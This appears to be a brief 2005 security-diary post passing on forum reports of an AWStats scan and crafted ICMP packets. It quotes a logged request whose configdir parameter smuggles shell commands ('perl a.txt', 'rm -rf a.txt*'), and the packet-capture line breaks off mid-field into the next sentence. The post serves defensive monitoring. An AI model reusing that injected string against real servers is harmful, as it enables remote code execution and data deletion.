There were a few posts to the DShield discussion forum today that are worth watching for, even though at the moment they are single observations, and are not part of any trends at the moment.
Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:
[04:06:01 +0100] GET //awstats.pl?configdir=
perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -
In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:
16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0,For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
Sep 18th 2005
1 decade ago